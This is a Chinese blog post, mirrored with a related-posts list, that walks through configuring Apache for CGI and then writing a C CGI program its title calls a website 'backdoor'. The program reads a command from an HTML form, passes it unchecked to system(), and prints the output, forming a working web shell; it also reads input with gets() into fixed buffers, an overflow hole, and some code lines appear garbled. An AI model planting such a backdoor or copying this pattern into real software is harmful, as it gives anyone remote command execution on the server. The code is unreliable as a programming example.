zoukankan      html  css  js  c++  java
  • c/c++----网站及其后门(CGI应用程序)

    C/C++学习到这儿,结合自己曾经学过的javasweb知识,现在让我们来看看,如何做一个CGI程序吧!

    首先了解一下啥子叫CGI  :CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。    ----来自百度百科

    1.  首先,我们需要 Apache server2.0(学习web,应该必须知道这个的,嘻嘻),安装好该软件之后,也许会出现很多的问题,导致打不开什么的。喵了个咪的,博主本人曾经也是搞了老半天,不过最后,还是搞定了!

    (1). 其实主要情况,我遇到就两种,第一种,就是我们为了节约开机时间,将IIS关闭了,或者有些侠客直接将它卸载了! 所以导致打不开!  

    面对这种问题,下一个就好了!  Apache server2.0 需要 IIS 配合。 

    (2). 第二种就是80端口被占用了,这是最容易发生的情况没有之一。  解决的方法有很多,但是个人比较喜欢这样来搞。

    cmd --》 net -ano   --->查看那些占用了80端口(一般是浏览器什么的居多) 几下他们的  PID ,然后在进程管理哪儿关闭就好了!

    上面的Apache server 运行起来之后,就在浏览器中 敲入 localhost ,会显示一个

    然后修改一个,http.cof文件   

    找到俩个位置:

    第一个位置: #  AddHandler cgi-script .cgi   将这个语句的前面#注释符去掉

    第二个位置: 

    <Directory "D:/Program Files/Apache Software Foundation/Apache2.2/cgi-bin">

    AllowOverride None

    Options None    -----将这个位置替换为:    Options Indexes ExecCGI

    Order allow,deny

    Allow from all

    </Directory>

    这两个位置配置好之后。就可以用C/C++编程了!

    第一步:我们编写一个这样的文件

    1 #include<stdio.h>

    2 int main(int args ,char * argv []) {

    3   

    4     printf("Content-type:text/html ");

    5     printf("hello world ! 我是cgi ");

    6     getchar();

    7   return 0;

    8 }

    编译,生成一个这样的 hello.exe文件、生成之后,我们将hell.exe的属性改为 hello.cgi

    然后将其放置到,自己安装的Apache server2.0文件中的cgi-bin文件下

    在浏览器中,再输入,localhost/cgi-bin/hello.cgi  就可以看到这样的画面

    2. 那么说了这么多,我们又该用c/c++写一个cgi来做后台,在背后来操作这个数据呢! 

    首先,我们需要写一个html,做个web的,对于这些当然,是再easy不过了! 为了节约时间,就写一个简陋点的html吧!!

    1 <html>

    2 <head>

    3   <title>后台</title>

    4 </head>

    6 <body>

    7             <h1> 后台界面</h1>

    8  <form action="http://localhost/cgi-bin/gxjun.cgi" method="post" id=CGI >

    9   

    10   请输入命令cmd: <input  type="text"  name="textlist"     /><br><br>  

    11   <input  type="submit"    /><br>

    12  </form>

    13  <hr>

    14 <body>

    15 </html>

    当然,这个当我们在做web的时候,这个是可以内嵌到,我们的项目中的!在于你将这个jsp放到哪个地儿啦!

    最后就是重点了! 就像我上面写的cgi一样! 写一个下面这样的代码:

    1 #define  _CRT_SECURE_NO_WARNINGS

    2 #include<stdio.h>

    3 #include<stdlib.h>

    4 //#include<stdexcept>

    5 #include<windows.h>

    7 //以调用System为举例

    8 void func(char ps []) {

    9     // ps 为cmd命令

    10     char *pl = strchr(ps,'=');  //pl指向当前的位置

    11     if(pl!=NULL)   ps = ps + (pl-ps+1);

    12      printf("命令cmd = %s ", ps);

    13     char cmd[256] = {''};

    14     char  filename[]  = "Gxjun.txt";   //暂定放置于当前目录。

    15     sprintf(cmd,"%s > %s ",ps,filename);  //将ps的内容写入cmd中

    16     //生成了一条指令

    17     //无论是否执行成功,都会生成一个Gxjun.txt文件

    18     FILE *fp = NULL;

    19     int tag=system(cmd);  

    20     if (tag == 1) {

    21         printf("命令格式错误!,请重新输入: ");

    22         goto loop;

    23     }

    24     if ((fp = fopen(filename, "r")) == NULL) {

    25         printf("没有发现文件!");

    26         goto loop ;

    27      }

    28 

    29      while (!feof(fp)) {

    30          char str=fgetc(fp);

    31           if (str == ' ') printf("<br><br> ");

    32           else if (str == ' ')printf(" ");

    33           else

    34               printf("%c",str);

    35      }

    36 

    37  loop:

    38      if (fp != NULL){

    39          fclose(fp);

    40          //并删除备份的文件

    41          system("del Gxjun.txt");

    42      }

    43      return ;

    44 }

    45 

    46 

    47 int main(int args ,char * argv []) {

    48   

    49     printf("Content-type:text/html ");

    50     //打印环境变量

    51     printf("   %s<br><br>", getenv("QUERY_STRING"));

    52     char szPost[256] = {''};

    53     gets(szPost);  //获取输入    

    54     if ( strlen(szPost) < 1 )

    55         strcpy( szPost , "ipconfig" );

    56     func(szPost);

    57     getchar();

    58   return 0;

    59 }

  • 相关阅读:
    死锁
    钩子函数和回调函数的区别
    蓝绿部署、滚动发布、灰度发布的介绍以及最佳实践
    小公司的瓶颈
    Modbus协议详解
    windows+jenkin
    Java:简单的多态实例
    一、Kubernetes系列之介绍篇
    Shell脚本自动搭建ipsec环境
    Appium(1):安卓自动化环境搭建 + Android SDK + Appium 环境搭建
  • 原文地址:https://www.cnblogs.com/jinhuixin/p/4368092.html
Copyright © 2011-2022 走看看